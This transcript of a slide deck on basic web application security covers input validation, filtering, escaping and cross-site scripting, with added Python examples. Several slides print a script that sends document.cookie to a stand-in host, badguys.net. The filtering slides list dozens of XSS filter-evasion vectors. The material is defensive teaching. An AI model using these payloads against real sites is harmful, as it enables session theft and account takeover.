Basic web application security

Presentation Transcript


Basic Web Application Security



User Input



Kick Your Arse



Three Ways

(All Awesome)



Validation



Passive

(No touchy-touchy)



This is a Number.

2



This is not a Number.

a



This is really not a Number.

<script>alert('loldongs')</script>



Filtering



Destructive

(One-Way Street)


Only letting the good stuff in.

or

Keeping out the bad stuff.



What’s the diff?

(Bro.)



Both can be error-prone...


What happens when you screw it up?

White-Listing → Usability Problems

Black-Listing → Security Problems

(Always a trade-off.)
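The three approaches run over the slide inputs, as an added example (Python, not code from the deck). It also plays out the trade-off just described: a whitelist for names strips the apostrophe out of a real name (usability), and a naive blacklist that removes `<script>` tags leaves a working tag behind once the nested vector from a later slide is run through it (security). The inputs are the slides' own; the function names and the rules they apply are my assumptions.

```python
"""Validation, filtering and escaping side by side.

Added example, not code from the deck. Inputs are the slides' own ("2", "a",
the <script> payload, the name Sam O'Brien and the <SC<SCRIPT>RIPT> vector);
the function names and the rules they apply are assumptions made here.
"""
import html
import re

SLIDE_INPUTS = ["2", "a", "<script>alert('loldongs')</script>"]


# Validation: passive. Looks, says yes or no, changes nothing.
def validate_number(value: str) -> bool:
    """True only if the entire string is an unsigned decimal integer."""
    return re.fullmatch(r"[0-9]+", value) is not None


# Filtering: destructive, one-way. Whatever is dropped cannot be recovered.
def filter_digits(value: str) -> str:
    """Whitelist filter: keep digits, throw everything else away."""
    return re.sub(r"[^0-9]", "", value)


def whitelist_name(value: str) -> str:
    """Whitelist for free text: letters and spaces only.
    Secure, but it mangles legitimate input (the usability problem)."""
    return re.sub(r"[^A-Za-z ]", "", value)


def blacklist_script(value: str) -> str:
    """Blacklist for free text: strip literal <script> and </script> tags.
    Usable, but a nested tag reassembles after the strip (the security problem)."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def looks_like_markup(value: str) -> bool:
    """Is any HTML tag still present after filtering?"""
    return re.search(r"<[a-z!/]", value, flags=re.IGNORECASE) is not None


# Escaping: non-destructive and reversible, but tied to one medium (HTML here).
def escape_html(value: str) -> str:
    return html.escape(value, quote=True)


def round_trips(value: str) -> bool:
    """Escaped data decodes back to exactly what went in."""
    return html.unescape(escape_html(value)) == value


def demo() -> dict:
    """Run the three approaches over the slide inputs; returned for inspection."""
    return {
        value: {
            "valid_number": validate_number(value),
            "filtered": filter_digits(value),
            "escaped": escape_html(value),
        }
        for value in SLIDE_INPUTS
    }


if __name__ == "__main__":
    for value, result in demo().items():
        print(repr(value), result)
    print(repr(whitelist_name("Sam O'Brien")))  # apostrophe gone: usability
    nested = "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>"
    print(repr(blacklist_script(nested)))       # tag reassembled: security
```

Note that only the escaping path is reversible: `filter_digits` and `whitelist_name` throw information away for good, while `escape_html` can be undone with `html.unescape`, which is what lets data arrive "the same on both sides".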



Escaping


Transport

Point A → Point B



Data will be the same on both sides.


Different Media, Different Escaping



HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>


SQL

Sam O'Brien

INSERT INTO mah_peeps (name)
VALUES ('Sam O\'Brien');

1, Sam O'Brien, 2010-09-02 18:30:00
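The same round trip through SQL, as an added example (Python with SQLite, not code from the deck). It shows the apostrophe breaking an unescaped statement, the hand-escaped form the slide illustrates, and the parameterised form where the driver does the escaping. The table name mah_peeps and the name Sam O'Brien are the slide's; the schema, the choice of SQLite and the helper names are my assumptions. One caveat the slide does not state: the backslash form `\'` it shows is MySQL's dialect, while standard SQL (and SQLite) doubles the quote instead.

```python
"""Getting an apostrophe safely through SQL.

Added example, not code from the deck. The table name mah_peeps and the name
Sam O'Brien are the slide's; the schema, SQLite, and the helper names are
assumptions made for this example.
"""
import sqlite3


def open_db() -> sqlite3.Connection:
    """In-memory SQLite database with the slide's table (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE mah_peeps ("
        "  id INTEGER PRIMARY KEY,"
        "  name TEXT NOT NULL,"
        "  created_at TEXT NOT NULL DEFAULT (datetime('now')))"
    )
    return conn


def insert_unescaped(conn: sqlite3.Connection, name: str) -> bool:
    """The wrong way: the data is pasted into the statement text, so the quote
    in O'Brien ends the string literal early. Returns False when SQLite
    rejects the statement (for this name it always does)."""
    try:
        conn.execute(f"INSERT INTO mah_peeps (name) VALUES ('{name}');")
        return True
    except sqlite3.OperationalError:
        return False


def sql_quote(value: str) -> str:
    """Escaping by hand: standard SQL doubles the quote. The slide's backslash
    form (\\') is MySQL's dialect; SQLite does not accept it."""
    return "'" + value.replace("'", "''") + "'"


def insert_escaped(conn: sqlite3.Connection, name: str) -> int:
    """Manual escaping first, then the statement is safe to run as text."""
    cur = conn.execute(f"INSERT INTO mah_peeps (name) VALUES ({sql_quote(name)});")
    return cur.lastrowid


def insert_parameterised(conn: sqlite3.Connection, name: str) -> int:
    """The driver does the escaping: the value never touches the SQL text."""
    cur = conn.execute("INSERT INTO mah_peeps (name) VALUES (?);", (name,))
    return cur.lastrowid


def fetch_name(conn: sqlite3.Connection, row_id: int):
    """Same data on both sides: read the name back unchanged."""
    row = conn.execute("SELECT name FROM mah_peeps WHERE id = ?;", (row_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = open_db()
    print("unescaped insert accepted:", insert_unescaped(db, "Sam O'Brien"))
    rid = insert_parameterised(db, "Sam O'Brien")
    print(rid, fetch_name(db, rid))
```

Manual quoting works only if every value is quoted in the dialect the database actually speaks; the parameterised form sidesteps that question, which is why it is the form to reach for.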



XSS

(Cross-Site Scripting)



SS

(XTREME Site Scripting)



Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.


<script>alert('HACKED BY LOLDONGS')</script>

Amateurs!



<script>alert(document.cookie)</script>

Hmm.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oh shit.



Why is this uncool?

(Yeah! Why?)


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Ooooh shit.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooh shit.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooooooooh shit.



Why is this really uncool?

(Because shut up.)



HTTP

Hyper-Text Thingy I-forgot-again



Stateless



No Idea Who You Are.


It can guess. (Badly.)

IP Address

Browser User-Agent



Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)



The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1



Browser sends the ID every request.

PHPSESSID=123your456mum789
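The basket mechanism in code, as an added example (Python, not code from the deck): the server mints an ID, puts it in the basket, and on every later request answers "who is this?" purely from the ID it gets back. The cookie names PHPSESSID, __utma and is_a_furry come from the slides; the session store, the user name and the helper names are my assumptions. The HttpOnly attribute in `set_cookie_header()` is also my addition, not something the slides discuss: it keeps the cookie out of `document.cookie`, which is exactly what the logthis.php payload reads.

```python
"""A session cookie is the whole identity.

Added example, not code from the deck. The cookie names PHPSESSID, __utma and
is_a_furry come from the slides; the session store, the user name and the
helper names are assumptions made here. HttpOnly in set_cookie_header() is
an addition, not something the slides discuss.
"""
import secrets
from http.cookies import SimpleCookie

# Server-side state: the only thing that maps an ID back to a person.
SESSIONS = {}


def start_session(username: str) -> str:
    """The server puts a unique ID in the basket. It must be unguessable,
    because presenting it is all the proof the server ever asks for."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


def set_cookie_header(sid: str) -> str:
    """Value of the Set-Cookie response header. HttpOnly hides the cookie from
    document.cookie, the very thing the logthis.php payload on the earlier
    slide reads (defensive addition, not on the slides)."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = sid
    jar["PHPSESSID"]["path"] = "/"
    jar["PHPSESSID"]["httponly"] = True
    return jar["PHPSESSID"].OutputString()


def whoami(cookie_header: str):
    """Parse the Cookie request header and answer 'who is this?'. HTTP itself
    has no idea; the answer is whoever the ID in the basket belongs to."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get("PHPSESSID")
    if morsel is None:
        return None                    # no ID in the basket: anonymous
    return SESSIONS.get(morsel.value)  # unknown or guessed ID: also anonymous


if __name__ == "__main__":
    sid = start_session("sam")
    print("Set-Cookie:", set_cookie_header(sid))
    print(whoami(f"PHPSESSID={sid}; __utma=12948.23.4211414.5553; is_a_furry=1"))
    print(whoami("PHPSESSID=123your456mum789"))  # None: a guessed ID buys nothing
```

Note what `whoami` does not check: nothing about the IP address or User-Agent the earlier slide calls bad guesses, and nothing about who typed the cookie in. Whoever holds the ID is, to the server, that user, which is the whole point of the slides that follow.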


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Look again.



THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-



Preventing Shenanigans


HTML

Validation → Really Hard.


HTML

Filtering → Still Really Hard.

  • Use a library, eg. HTML Purifier.


HTML

Escaping → Dead Easy.

  • Most languages have stuff to handle this, eg.

  • htmlentities(), cgi.escape(), CGI.escape()
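Escaping on the way into HTML, as an added example (Python, not code from the deck). It reproduces the earlier HTML slide (`<b>Huh.</b>` becoming `<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>`) and then runs the cookie-stealing payload through the same step so that it arrives as text rather than as a live script. It uses `html.escape()`, which is the Python 3 replacement for the `cgi.escape()` named above (`cgi.escape` was removed in Python 3.8). The sample strings are the slides' own; the profile template, the attribute example and the function names are my assumptions.

```python
"""Escaping untrusted text on its way into HTML.

Added example, not code from the deck. It uses html.escape(), the Python 3
replacement for the cgi.escape() the slide names (cgi.escape was removed in
Python 3.8). The sample strings are the slides' own; the template and the
function names are assumptions made here.
"""
import html

HUH = "<b>Huh.</b>"
COOKIE_THIEF = (
    "<script>document.write('<img src=\"http://badguys.net/logthis.php?d='"
    "+document.cookie+'\" style=\"display:none;\">');</script>"
)


def render_unsafe(user_text: str) -> str:
    """Raw data spliced into the page: any markup in it is live."""
    return f"<p><i>{user_text}</i></p>"


def render(user_text: str) -> str:
    """HTML text context: & < > " ' become entities, so the browser shows the
    characters instead of parsing them. This is the slide's HTML example."""
    return f"<p><i>{html.escape(user_text, quote=True)}</i></p>"


def render_attribute(user_text: str) -> str:
    """Attribute context: escape the same way, and keep the attribute quoted,
    otherwise a space in the data would end the attribute early."""
    return f'<input name="user" value="{html.escape(user_text, quote=True)}">'


def contains_live_tag(markup: str, tag: str) -> bool:
    """Did the named element survive as markup rather than as escaped text?"""
    return f"<{tag}" in markup.lower()


def round_trips(user_text: str) -> bool:
    """Escaping is transport, not destruction: decoding gives the data back."""
    return html.unescape(html.escape(user_text, quote=True)) == user_text


if __name__ == "__main__":
    print(render(HUH))
    print(render_unsafe(COOKIE_THIEF))  # a live <script> on your page
    print(render(COOKIE_THIEF))         # the same string, now just text
```

The escaping is applied at output time, once per medium: the stored value stays exactly what the user typed, and `render` decides how it is written into HTML. Data destined for a different medium (SQL, a URL, a JavaScript string) needs that medium's escaping instead.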



How hard is filtering?

(It’s just <script>, right?)


THIS HARD.

<IMG SRC=javascript:alert('a')>

<img src=javascript:alert(&quot;a&quot;)>

<img """><script>alert('a')</script>">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;
&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;
&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72
&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72
&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');">

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<img onmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<img src="javascript:alert('a')"

  • (Well, then.)


THIS HARD.

<iframe src=http://foo/x.html <

<body background="javascript:alert('a')">

<BODY ONLOAD=alert('a')>

<img dynsrc="javascript:alert('a')">

<img lowsrc="javascript:alert('a')">

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE="&{alert('a')}">

<LAYER SRC="http://foo/x.html"></LAYER>

<link rel="stylesheet" href="javascript:alert('a');">

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox("a")'>

<img src="livescript:alert('a')">

¼script¾alert(¢XSS¢)¼/script¾ (US-ASCII encoding evasion)

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('a');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

  • (Well, then.)


THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a
\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061
\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="
type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  • (Well, then.)



And one last thing.

(Groan.)



Remember <script>alert()</script>?

(Yes, I do. Shut up.)



alert() can be ANY JAVASCRIPT.

(Yes, and...?)



Do you have any forms on your page?

(Yes.)



Do you have any javascript functions your site uses to do anything useful?

(... Yes.)


Does your site make any AJAX calls to do anything useful?

(... Oh.)



That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)


Send someone to a link that looks like: http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)


Or store something that will output this on someone's profile page: <script>doStuff();</script>

(... Oooooooooooooooh.)



... And you’re hosed.

(Shit.)



The Human Element

Touchy-Feely Commie Bullshit.




  • Login